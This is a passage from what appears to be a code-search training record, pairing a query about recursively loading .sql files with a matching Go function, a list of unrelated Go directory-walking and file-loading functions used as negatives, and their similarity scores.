true\n\t\t\tdefault:\n\t\t\t\treq = false\n\t\t\t}\n\n\t\t\tf = &dms.Field{\n\t\t\t\tName: attrs[\"field\"],\n\t\t\t\tDescription: stripNewlines(attrs[\"description\"]),\n\t\t\t\tLabel: attrs[\"label\"],\n\t\t\t\tRequired: req,\n\t\t\t\tTable: t,\n\t\t\t\tAttrs: attrs,\n\t\t\t}\n\n\t\t\t// Add schema information.\n\t\t\tif sattrs := fieldSchemata.Get(t.Name, f.Name); sattrs != nil {\n\t\t\t\tf.Type = sattrs[\"type\"]\n\n\t\t\t\tif sattrs[\"length\"] != \"\" {\n\t\t\t\t\tif l, err := strconv.Atoi(sattrs[\"length\"]); err != nil {\n\t\t\t\t\t\tlogrus.Error(\"invalid length %s\", sattrs[\"length\"])\n\t\t\t\t\t} else {\n\t\t\t\t\t\tf.Length = l\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tif sattrs[\"precision\"] != \"\" {\n\t\t\t\t\tif l, err := strconv.Atoi(sattrs[\"precision\"]); err != nil {\n\t\t\t\t\t\tlogrus.Error(\"invalid precision %s\", sattrs[\"precision\"])\n\t\t\t\t\t} else {\n\t\t\t\t\t\tf.Precision = l\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tif sattrs[\"scale\"] != \"\" {\n\t\t\t\t\tif l, err := strconv.Atoi(sattrs[\"scale\"]); err != nil {\n\t\t\t\t\t\tlogrus.Error(\"invalid scale %s\", sattrs[\"scale\"])\n\t\t\t\t\t} else {\n\t\t\t\t\t\tf.Scale = l\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tf.Default = sattrs[\"default\"]\n\t\t\t}\n\n\t\t\tt.Fields.Add(f)\n\t\t}\n\t}\n\n\tvar (\n\t\trt *dms.Table\n\t\trf *dms.Field\n\t)\n\n\t// Add references.\n\tfor _, ref := range refs {\n\t\tt = model.Tables.Get(ref.Attrs[\"table\"])\n\n\t\tif t == nil {\n\t\t\tlogrus.Warnf(\"refs (%s): no source table `%s`\", model.Path, ref.Attrs[\"table\"])\n\t\t\tcontinue\n\t\t}\n\n\t\tf = t.Fields.Get(ref.Attrs[\"field\"])\n\n\t\tif f == nil {\n\t\t\tlogrus.Warnf(\"refs (%s:%s): no source field `%s`\", model.Path, t.Name, ref.Attrs[\"field\"])\n\t\t\tcontinue\n\t\t}\n\n\t\trt = model.Tables.Get(ref.Attrs[\"ref_table\"])\n\n\t\tif rt == nil {\n\t\t\tlogrus.Warnf(\"refs (%s): could not reference table `%s` by %s\", model.Path, ref.Attrs[\"ref_table\"], f)\n\t\t\tcontinue\n\t\t}\n\n\t\trf = rt.Fields.Get(ref.Attrs[\"ref_field\"])\n\n\t\tif rf == nil {\n\t\t\tlogrus.Warnf(\"refs (%s): could not reference field `%s` by %s\", model.Path, ref.Attrs[\"ref_field\"], f)\n\t\t\tcontinue\n\t\t}\n\n\t\tref.Field = rf\n\n\t\t// Add references\n\t\tf.References = ref\n\n\t\t// Add back references.\n\t\trf.InboundRefs = append(rf.InboundRefs, &dms.Reference{\n\t\t\tName: ref.Name,\n\t\t\tField: f,\n\t\t})\n\t}\n}", "func (c *diskCache) loadExistingFiles() error {\n\t// Walk the directory tree\n\ttype NameAndInfo struct {\n\t\tinfo os.FileInfo\n\t\tname string\n\t}\n\tvar files []NameAndInfo\n\terr := filepath.Walk(c.dir, func(name string, info os.FileInfo, err error) error {\n\t\tif !info.IsDir() {\n\t\t\tfiles = append(files, NameAndInfo{info, name})\n\t\t}\n\t\treturn nil\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Sort in increasing order of atime\n\tsort.Slice(files, func(i int, j int) bool {\n\t\treturn atime.Get(files[i].info).Before(atime.Get(files[j].info))\n\t})\n\n\tfor _, f := range files {\n\t\trelPath := f.name[len(c.dir)+1:]\n\t\tc.lru.Add(relPath, &lruItem{\n\t\t\tsize: f.info.Size(),\n\t\t\tcommitted: true,\n\t\t})\n\t}\n\treturn nil\n}", "func TestParsePath(t *testing.T) {\n\tdb := new(DB)\n\tdb.qm = make(queryMap)\n\terr := db.ParsePath(queriesDir)\n\tif err != nil {\n\t\tt.Fatal(\"ParseFileGlob err;\", err)\n\t}\n\texp, got := 5, len(db.qm)\n\tif exp != got {\n\t\tt.Fatal(\"Expected\", exp, \"queries in the map; Got\", got)\n\t}\n}", "func gatherFilesToLayersMap(fileMap map[string]string, currentPath string) (map[string]string, error) {\n\tcurrentFile, err := os.Open(currentPath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer currentFile.Close()\n\n\treader, err := aci.NewCompressedTarReader(currentFile)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif err = tarball.Walk(*reader, func(t *tarball.TarFile) error {\n\t\tif t.Name() == \"manifest\" {\n\t\t\treturn nil\n\t\t}\n\n\t\tfileMap[t.Name()] = currentPath\n\t\treturn nil\n\t}); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn fileMap, nil\n}", "func walkDir(dir string, wg *sync.WaitGroup) {\n\tdefer wg.Done()\n\terr := filepath.Walk(dir, func(path string, info os.FileInfo, err error) error {\n\t\tvar encoded []string = []string{}\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif !info.IsDir() {\n\t\t\tfmt.Println(\"reading for file \", info.Name())\n\t\t\tdata, err := ioutil.ReadFile(path)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(\"Error reading file %s\", err)\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tfor _, i := range data {\n\t\t\t\tencoded = append(encoded, fmt.Sprintf(\"%d\", int(i)))\n\t\t\t}\n\t\t\tData = append(Data, Payload{Path: info.Name(), Load: fmt.Sprintf(\"{%s}\", strings.Join(encoded, \",\"))})\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(err)\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t\treturn nil\n\t})\n\tif err != nil {\n\t\tfmt.Println(\"Error walking through directory \", dir)\n\t}\n}", "func findUntrackedFilesFromDir(c *Client, opts LsFilesOptions, root, parent, dir File, tracked map[IndexPath]bool, recursedir bool, ignorePatterns []IgnorePattern) (untracked []*IndexEntry) {\n\tfiles, err := ioutil.ReadDir(dir.String())\n\tif err != nil {\n\t\treturn nil\n\t}\n\tfor _, ignorefile := range opts.ExcludePerDirectory {\n\t\tignoreInDir := ignorefile\n\t\tif dir != \"\" {\n\t\t\tignoreInDir = dir + \"/\" + ignorefile\n\t\t}\n\n\t\tif ignoreInDir.Exists() {\n\t\t\tlog.Println(\"Adding excludes from\", ignoreInDir)\n\n\t\t\tpatterns, err := ParseIgnorePatterns(c, ignoreInDir, dir)\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tignorePatterns = append(ignorePatterns, patterns...)\n\t\t}\n\t}\nfiles:\n\tfor _, fi := range files {\n\t\tfname := File(fi.Name())\n\t\tif fi.Name() == \".git\" {\n\t\t\tcontinue\n\t\t}\n\t\tfor _, pattern := range ignorePatterns {\n\t\t\tvar name File\n\t\t\tif parent == \"\" {\n\t\t\t\tname = fname\n\t\t\t} else {\n\t\t\t\tname = parent + \"/\" + fname\n\t\t\t}\n\t\t\tif pattern.Matches(name.String(), fi.IsDir()) {\n\t\t\t\tcontinue files\n\t\t\t}\n\t\t}\n\t\tif fi.IsDir() {\n\t\t\tif !recursedir {\n\t\t\t\t// This isn't very efficient, but lets us implement git ls-files --directory\n\t\t\t\t// without too many changes.\n\t\t\t\tindexPath, err := (parent + \"/\" + fname).IndexPath(c)\n\t\t\t\tif err != nil {\n\t\t\t\t\tpanic(err)\n\t\t\t\t}\n\t\t\t\tdirHasTracked := false\n\t\t\t\tfor path := range tracked {\n\t\t\t\t\tif strings.HasPrefix(path.String(), indexPath.String()) {\n\t\t\t\t\t\tdirHasTracked = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tif !dirHasTracked {\n\t\t\t\t\tif opts.Directory {\n\t\t\t\t\t\tif opts.NoEmptyDirectory {\n\t\t\t\t\t\t\tif files, err := ioutil.ReadDir(fname.String()); len(files) == 0 && err == nil {\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t\tindexPath += \"/\"\n\t\t\t\t\t}\n\t\t\t\t\tuntracked = append(untracked, &IndexEntry{PathName: indexPath})\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t}\n\t\t\tvar newparent, newdir File\n\t\t\tif parent == \"\" {\n\t\t\t\tnewparent = fname\n\t\t\t} else {\n\t\t\t\tnewparent = parent + \"/\" + fname\n\t\t\t}\n\t\t\tif dir == \"\" {\n\t\t\t\tnewdir = fname\n\t\t\t} else {\n\t\t\t\tnewdir = dir + \"/\" + fname\n\t\t\t}\n\n\t\t\trecurseFiles := findUntrackedFilesFromDir(c, opts, root, newparent, newdir, tracked, recursedir, ignorePatterns)\n\t\t\tuntracked = append(untracked, recurseFiles...)\n\t\t} else {\n\t\t\tvar filePath File\n\t\t\tif parent == \"\" {\n\t\t\t\tfilePath = File(strings.TrimPrefix(fname.String(), root.String()))\n\n\t\t\t} else {\n\t\t\t\tfilePath = File(strings.TrimPrefix((parent + \"/\" + fname).String(), root.String()))\n\t\t\t}\n\t\t\tindexPath, err := filePath.IndexPath(c)\n\t\t\tif err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\t\t\tindexPath = IndexPath(filePath)\n\n\t\t\tif _, ok := tracked[indexPath]; !ok {\n\t\t\t\tuntracked = append(untracked, &IndexEntry{PathName: indexPath})\n\t\t\t}\n\t\t}\n\t}\n\treturn\n}", "func (m *MapDisk) Initialize(dir string) {\n\terr := filepath.Walk(dir, m.loadFile)\n\tif err != nil {\n\t\tlog.DiskErrorf(\"error while initializing: %s\", err)\n\t}\n\tlog.DiskInfof(m.list())\n}", "func (manager *Manager) loadSchemaFromFile(filePath string) error {\n\tif filePath == \"\" {\n\t\treturn nil\n\t}\n\tlog.Info(\"Loading schema %s ...\", filePath)\n\tschemas, err := util.LoadMap(filePath)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tnamespaces, _ := schemas[\"namespaces\"].([]interface{})\n\tfor _, namespaceData := range namespaces {\n\t\tnamespace, err := NewNamespace(namespaceData)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif err = manager.registerNamespace(namespace); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\tschemaObjList := []*Schema{}\n\tschemaMap := map[string]*Schema{}\n\tlist, _ := schemas[\"schemas\"].([]interface{})\n\tfor _, schemaData := range list {\n\t\tif fileName, ok := schemaData.(string); ok {\n\t\t\terr := manager.loadSchemaFromFile(fileName) // recursive call for included files\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t} else {\n\t\t\tmetaschema, _ := manager.schema(\"schema\")\n\t\t\tschemaObj, err := newSchemaFromObj(schemaData, metaschema)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tschemaMap[schemaObj.ID] = schemaObj\n\t\t\tschemaObjList = append(schemaObjList, schemaObj)\n\t\t}\n\t}\n\t_, err = reorderSchemas(schemaObjList)\n\tif err != nil {\n\t\tlog.Warning(\"Error in reordering schema %s\", err)\n\t}\n\tfor _, schemaObj := range schemaObjList {\n\t\tif schemaObj.IsAbstract() {\n\t\t\t// Register abstract schema\n\t\t\tmanager.registerSchema(schemaObj)\n\t\t} else {\n\t\t\tfor _, baseSchemaID := range schemaObj.Extends {\n\t\t\t\tbaseSchema, ok := manager.schema(baseSchemaID)\n\t\t\t\tif !ok {\n\t\t\t\t\treturn fmt.Errorf(\"Base Schema %s not found\", baseSchemaID)\n\t\t\t\t}\n\t\t\t\tif !baseSchema.IsAbstract() {\n\t\t\t\t\treturn fmt.Errorf(\"Base Schema %s isn't abstract type\", baseSchemaID)\n\t\t\t\t}\n\t\t\t\tschemaObj.Extend(baseSchema)\n\t\t\t}\n\t\t}\n\t}\n\t// Reorder schema by relation topology\n\tschemaOrder, err := reorderSchemas(schemaObjList)\n\tif err != nil {\n\t\tlog.Warning(\"Error in reordering schema %s\", err)\n\t}\n\n\tfor _, id := range schemaOrder {\n\t\tschemaObj := schemaMap[id]\n\t\tif !schemaObj.IsAbstract() {\n\t\t\terr = manager.registerSchema(schemaObj)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\tpolicies, _ := schemas[\"policies\"].([]interface{})\n\tif policies != nil {\n\t\tfor _, policyData := range policies {\n\t\t\tpolicy, err := NewPolicy(policyData)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tmanager.policies = append(manager.policies, policy)\n\t\t}\n\t}\n\textensions, _ := schemas[\"extensions\"].([]interface{})\n\tif extensions == nil {\n\t\treturn nil\n\t}\n\n\tfor _, extensionData := range extensions {\n\t\td := extensionData.(map[string](interface{}))\n\t\trawurl, ok := d[\"url\"].(string)\n\t\tif ok {\n\t\t\td[\"url\"], err = fixRelativeURL(rawurl, filepath.Dir(filePath))\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\n\t\textension, err := NewExtension(extensionData)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\textension.File = filePath\n\t\tmanager.Extensions = append(manager.Extensions, extension)\n\t}\n\n\treturn nil\n}", "func (m *LocalManager) List(ctx context.Context) (map[string]linker.Storage, error) {\n\tinstances := make(map[string]linker.Storage)\n\n\tfilepath.Walk(m.path, func(path string, info os.FileInfo, err error) error {\n\n\t\tif info.IsDir() {\n\t\t\treturn nil\n\t\t}\n\n\t\tlog.From(ctx).Debug(\"loading\", zap.String(\"path\", path))\n\n\t\tfile := filepath.Base(path)\n\n\t\tif strings.HasPrefix(file, \"db-\") {\n\t\t\tinstance, err := NewLocalStorage(ctx, path)\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"recreating storage\")\n\t\t\t}\n\n\t\t\tinstances[strings.TrimPrefix(file, \"db-\")] = instance\n\t\t}\n\t\treturn nil\n\t})\n\n\treturn instances, nil\n}", "func walScanDir(w *model.Wal) int64 {\n\tvar base = \"binlog.\"\n\tvar min, max int64 = 1 << 30, 0\n\n\tf, err := os.Open(w.Dir)\n\tif os.IsNotExist(err) {\n\t\treturn min\n\t}\n\tif err := f.Close(); err != nil {\n\t\tutils.Log.Panic(err)\n\t}\n\n\tif err := filepath.Walk(w.Dir, func(path string, info os.FileInfo, err error) error {\n\t\tif info.IsDir() {\n\t\t\treturn nil\n\t\t}\n\t\tif !strings.HasPrefix(info.Name(), base) {\n\t\t\treturn nil\n\t\t}\n\t\tidx, err := strconv.ParseInt(info.Name()[len(base):], 10, 64)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tn := idx\n\t\tif n > max {\n\t\t\tmax = n\n\t\t}\n\t\tif n < min {\n\t\t\tmin = n\n\t\t}\n\t\treturn nil\n\t}); err != nil {\n\t\tutils.Log.Panic(err)\n\t}\n\n\tw.Next = max + 1\n\treturn min\n}", "func (d *directory) load() error {\n\tif len(d.data) > 0 {\n\t\treturn nil\n\t}\n\t// List of keys that should be pruned when running the merged data\n\t// through the spruce evaluator\n\t// * _public_key: only present in encrypted ejson files to identify the correct private key\n\t// not required in resulting document\n\tpruneKeys := []string{\"_public_key\"}\n\n\tvar err error\n\t// get the list of files that should be merged\n\terr = d.createOrderedDataFileList()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tlog.WithFields(log.Fields{\n\t\t\"files\": strings.Join(d.orderedFileList[:], \" \"),\n\t}).Debug(\"Ordered list of files to merge\")\n\n\t// merge everything while decrypting any ejson files encountered\n\tfor _, path := range d.orderedFileList {\n\t\tfile, err := NewFile(path, true, d.ejson)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tdoc := file.Map()\n\t\terr = mergo.Merge(&d.data, doc, mergo.WithOverride)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\terr = spruce.Eval(&d.data, d.skipEval, pruneKeys)\n\treturn err\n}", "func (dir *Dir) FileFor(keyer tengo.ObjectKeyer) *SQLFile {\n\tvar dirPath, base string\n\tif stmt, ok := keyer.(*tengo.Statement); ok && stmt.File != \"\" {\n\t\tdirPath, base = filepath.Split(stmt.File)\n\t} else {\n\t\tdirPath = dir.Path\n\t\tbase = FileNameForObject(keyer.ObjectKey().Name)\n\t}\n\n\t// Build the real file path, as well as a version of the path usable as a\n\t// map key. For looking up whether we already have a file at that path, the\n\t// file name will be lowercased as a map key, *unless* the dir already had at\n\t// least one naming conflict when the dir was initially processed (e.g. both\n\t// \"Foo.sql\" and \"foo.sql\" already existed). We want to avoid introducing that\n\t// scenario since on case-insensitive systems these will refer to the same\n\t// file.\n\tfilePathReal := filepath.Join(dirPath, base)\n\tvar filePathKey string\n\tif dir.retainMapKeyCasing {\n\t\tfilePathKey = filePathReal\n\t} else {\n\t\tfilePathKey = filepath.Join(dirPath, strings.ToLower(base))\n\t}\n\n\t// No file yet at that path: return a new SQLFile, but no need to mark it\n\t// dirty / actually create the file or write anything. The caller can handle\n\t// that if they're adding a statement to the file.\n\tif dir.SQLFiles[filePathKey] == nil {\n\t\tdir.SQLFiles[filePathKey] = &SQLFile{\n\t\t\tFilePath: filePathReal,\n\t\t\tStatements: []*tengo.Statement{},\n\t\t}\n\t}\n\treturn dir.SQLFiles[filePathKey]\n}", "func (s *schg) walkFunc() filepath.WalkFunc {\n\tvar ignDir string\n\treturn func(path string, info os.FileInfo, extErr error) error {\n\t\tif extErr != nil {\n\t\t\treturn extErr\n\t\t}\n\t\t// if currently in directory with own definitions.json file,\n\t\t// we are ignoring it's content\n\t\tif ignDir != \"\" && strings.HasPrefix(path, ignDir) {\n\t\t\treturn nil\n\t\t}\n\n\t\t// checking if current directory has independent definitions.json file\n\t\t// if that's true, we are storing info about this path in ignDir\n\t\t// and continuing ignoring this directory.\n\t\tif info.IsDir() {\n\t\t\tf := filepath.Join(path, definitionsFile)\n\t\t\t_, err := os.Stat(f)\n\t\t\tif (err == nil || !os.IsNotExist(err)) && f != s.defFile {\n\t\t\t\tignDir = path\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\t\t// current directory is not ignored and ignored one is left\n\t\tignDir = \"\"\n\t\tif info.Name() != definitionsFile && filepath.Ext(info.Name()) == `.json` {\n\t\t\tdata, err := ioutil.ReadFile(path)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tvar mapSchema map[string]interface{}\n\t\t\tif err := json.Unmarshal(data, &mapSchema); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdef, err := s.makeDefinitions(s.findReferences(mapSchema))\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif _, ok := mapSchema[`definitions`]; ok {\n\t\t\t\treturn fmt.Errorf(schemaHasDefinitionsErr, info.Name(), mapSchema)\n\t\t\t}\n\t\t\t// inject required definitions into processing schema.\n\t\t\tmapSchema[`definitions`] = def\n\t\t\tmarshaled, err := json.Marshal(mapSchema)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := s.dumpToTmpDirs(path, marshaled); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t\treturn nil\n\t}\n}", "func scanDir(rootDir string) error {\n\tdirListing, err := ioutil.ReadDir(rootDir)\n\tif err != nil {\n\t\treturn errors.New(\"Error reading directory structure\")\n\t}\n\tfor _, file := range dirListing {\n\n\t\tfullPath := rootDir + file.Name()\n\t\tinPath := checkPath(strings.ToLower(fullPath))\n\t\tisDir := file.IsDir()\n\t\tfileMime := findType(file.Name(), isDir)\n\t\tsizeString, sizeClr := byteSize(file.Size()).SizeDetails()\n\t\tfileClr := getFileColors(file, inPath, sizeClr)\n\t\tif isDir {\n\t\t\tfullPath += \"\\\\\"\n\t\t}\n\t\tfileCollection.fileList = append(fileCollection.fileList, fileDetails{\n\t\t\tfullName: fullPath,\n\t\t\tfileType: fileMime,\n\t\t\tmode: file.Mode().String(),\n\t\t\tsize: sizeString,\n\t\t\tmodTime: file.ModTime().Format(timeFormat),\n\t\t\tcolors: *fileClr,\n\t\t})\n\t}\n\treturn nil\n}", "func ByDir(paths ...string) map[string][]string {\n\tm := make(map[string][]string)\n\tfor _, path := range paths {\n\t\tpath = Normalize(path)\n\t\tdir := filepath.Dir(path)\n\t\tm[dir] = append(m[dir], path)\n\t}\n\tfor _, dirPaths := range m {\n\t\tsort.Strings(dirPaths)\n\t}\n\treturn m\n}", "func recursiveHash(dir string, fout string) {\n\tf, err := os.Create(fout)\n\tif err != nil {\n\t\tlog.Print(err)\n\t}\n\tdefer f.Close()\n\tfilepath.Walk(dir, func(path string, file os.FileInfo, _ error) error {\n\t\tif !file.IsDir() {\n\t\t\tfileData, err := ioutil.ReadFile(path)\n\t\t\tif err != nil {\n\t\t\t\tlog.Print(err)\n\t\t\t}\n\t\t\trel, err := filepath.Rel(dir, path)\n\t\t\tif err != nil {\n\t\t\t\tlog.Print(err)\n\t\t\t}\n\t\t\tfmt.Printf(\"%x *%s\\n\", md5.Sum(fileData), rel)\n\t\t\tvalue := md5.Sum(fileData)\n\n\t\t\ts := hex.EncodeToString(value[:]) + \" *\" + rel + \"\\n\"\n\t\t\tf.WriteString(s)\n\t\t}\n\t\treturn nil\n\t})\n\tf.Sync()\n}", "func LoadShards(dataDir string, walDir string, database string, retentionPolicy string, shardFilter string) ([]ShardInfo, error) {\n\tdbDirs, err := ioutil.ReadDir(dataDir)\n\tvar shards []ShardInfo\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfor _, db := range dbDirs {\n\t\tdbPath := filepath.Join(dataDir, db.Name())\n\t\tif !db.IsDir() {\n\t\t\tlog.Println(\"Skipping database directory\")\n\t\t\tcontinue\n\t\t}\n\n\t\tif database != \"\" && database != db.Name() {\n\t\t\tcontinue\n\t\t}\n\n\t\trpDirs, err := ioutil.ReadDir(dbPath)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tfor _, rp := range rpDirs {\n\t\t\trpPath := filepath.Join(dataDir, db.Name(), rp.Name())\n\t\t\tif !rp.IsDir() {\n\t\t\t\tlog.Println(\"Skipping retention policy directory\")\n\t\t\t}\n\n\t\t\tif rp.Name() == _seriesFileDirectory {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tif retentionPolicy != \"\" && retentionPolicy != rp.Name() {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tshardDirs, err := ioutil.ReadDir(rpPath)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\n\t\t\tfor _, sh := range shardDirs {\n\t\t\t\tif sh.Name() == _seriesFileDirectory {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tif shardFilter != \"\" && shardFilter != sh.Name() {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\n\t\t\t\tshPath := filepath.Join(dataDir, db.Name(), rp.Name(), sh.Name())\n\t\t\t\twalPath := filepath.Join(walDir, db.Name(), rp.Name(), sh.Name())\n\n\t\t\t\tshardID, err := strconv.ParseUint(sh.Name(), 10, 64)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Printf(\"invalid shard ID found at path '%s'\", shPath)\n\t\t\t\t\treturn nil, err\n\t\t\t\t}\n\n\t\t\t\tlog.Printf(\"Found shard '%s' (%d) with WAL '%s'\\n\", shPath, shardID, walPath)\n\n\t\t\t\tfieldsIndexPath := filepath.Join(shPath, _fieldIndexFileName)\n\t\t\t\tfieldsIndex, err := tsdb.NewMeasurementFieldSet(fieldsIndexPath)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn nil, err\n\t\t\t\t}\n\n\t\t\t\ttsmFiles, err := filepath.Glob(filepath.Join(shPath, fmt.Sprintf(\"*.%s\", tsm1.TSMFileExtension)))\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn nil, err\n\t\t\t\t}\n\n\t\t\t\twalFiles, err := filepath.Glob(filepath.Join(walPath, fmt.Sprintf(\"%s*.%s\", tsm1.WALFilePrefix, tsm1.WALFileExtension)))\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn nil, err\n\t\t\t\t}\n\n\t\t\t\tshardInfo := ShardInfo{\n\t\t\t\t\tPath: shPath,\n\t\t\t\t\tID: shardID,\n\t\t\t\t\tDatabase: db.Name(),\n\t\t\t\t\tRetentionPolicy: rp.Name(),\n\t\t\t\t\tTsmFiles: tsmFiles,\n\t\t\t\t\tFieldsIndex: fieldsIndex,\n\t\t\t\t\tWalFiles: walFiles,\n\t\t\t\t}\n\n\t\t\t\tshards = append(shards, shardInfo)\n\t\t\t}\n\t\t}\n\t}\n\n\treturn shards, nil\n}", "func LoadMigrations() ([]*Migration, error) {\n\tfiles, err := ioutil.ReadDir(migrateName)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tm := []*Migration{}\n\n\tfor _, fn := range files {\n\t\tg, err := ReadMigration(fn.Name())\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tm = append(m, g)\n\t}\n\n\treturn m, nil\n}" ]
[ "0.6065338", "0.58534473", "0.5724996", "0.5711952", "0.5590001", "0.5583293", "0.54925483", "0.5492055", "0.5490284", "0.5489595", "0.53793484", "0.5313845", "0.53030306", "0.5302789", "0.52934", "0.52703196", "0.52700865", "0.5247235", "0.52343476", "0.515752", "0.5136267", "0.512893", "0.5126491", "0.5100085", "0.50913304", "0.5089373", "0.506487", "0.5046501", "0.50257707", "0.496572", "0.49623168", "0.49524575", "0.49370047", "0.49167898", "0.48757994", "0.48699555", "0.48672122", "0.4863291", "0.4841503", "0.48409984", "0.4832189", "0.4832151", "0.482671", "0.48256913", "0.48192888", "0.47780046", "0.47755113", "0.47486663", "0.47373006", "0.47264105", "0.47166502", "0.47141767", "0.47137845", "0.47127548", "0.47051698", "0.4704537", "0.47021744", "0.46902406", "0.4687741", "0.4684491", "0.46837437", "0.4683324", "0.4675401", "0.4663071", "0.4662278", "0.46611768", "0.46572146", "0.4655617", "0.4646275", "0.4631214", "0.4630828", "0.46246395", "0.46232218", "0.46196768", "0.46047062", "0.46001774", "0.45941865", "0.45920855", "0.4586461", "0.45863488", "0.4585667", "0.4582349", "0.45812997", "0.45807076", "0.4578462", "0.45772007", "0.45746073", "0.4567772", "0.45657924", "0.45655504", "0.45561078", "0.4554288", "0.4551624", "0.45442894", "0.45356414", "0.4530539", "0.452908", "0.4510199", "0.44992805", "0.44901618" ]
0.5860178
1
DirOrdered recursively loads all .sql files from a specified folder and returns them as a slice
func DirOrdered(dir string) ([]File, error) { if s, err := os.Stat(dir); err != nil || !s.IsDir() { return nil, ErrDirSql } return readFiles(dir) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func sqlFiles(dirPath, repoBase string) ([]SQLFile, error) {\n\tfileInfos, err := ioutil.ReadDir(dirPath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tresult := make([]SQLFile, 0, len(fileInfos))\n\tfor _, fi := range fileInfos {\n\t\tname := fi.Name()\n\t\t// symlinks: verify it points to an existing file within repoBase. If it\n\t\t// does not, or if any error occurs in any step in checking, skip it.\n\t\tif fi.Mode()&os.ModeSymlink == os.ModeSymlink {\n\t\t\tdest, err := os.Readlink(path.Join(dirPath, name))\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tdest = filepath.Clean(dest)\n\t\t\tif !filepath.IsAbs(dest) {\n\t\t\t\tif dest, err = filepath.Abs(path.Join(dirPath, dest)); err != nil {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t}\n\t\t\tif !strings.HasPrefix(dest, repoBase) {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif fi, err = os.Lstat(dest); err != nil { // using Lstat here to prevent symlinks-to-symlinks\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\t\tdestName := fi.Name()\n\t\tif strings.HasSuffix(destName, \".sql\") && fi.Mode().IsRegular() {\n\t\t\tsf := SQLFile{\n\t\t\t\tDir: dirPath,\n\t\t\t\tFileName: name, // name relative to dirPath, NOT symlink destination!\n\t\t\t}\n\t\t\tresult = append(result, sf)\n\t\t}\n\t}\n\treturn result, nil\n}", "func sqlFiles(dirPath, repoBase string) (result []string, err error) {\n\tentries, err := os.ReadDir(dirPath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, entry := range entries {\n\t\tname := entry.Name()\n\t\tfi, err := entry.Info()\n\t\tif err != nil {\n\t\t\tcontinue\n\t\t}\n\t\t// symlinks: verify it points to an existing file within repoBase. If it\n\t\t// does not, or if any error occurs in any step in checking, skip it.\n\t\tif fi.Mode()&os.ModeSymlink == os.ModeSymlink {\n\t\t\tdest, err := os.Readlink(filepath.Join(dirPath, name))\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tdest = filepath.Clean(dest)\n\t\t\tif !filepath.IsAbs(dest) {\n\t\t\t\tif dest, err = filepath.Abs(filepath.Join(dirPath, dest)); err != nil {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t}\n\t\t\tif !strings.HasPrefix(dest, repoBase) {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\t// Make fi now point to the symlink destination. Lstat is used here to\n\t\t\t// intentionally only allow one level of indirection; multi-hop symlinks\n\t\t\t// will get filtered out by the fi.Mode().IsRegular() check below.\n\t\t\tif fi, err = 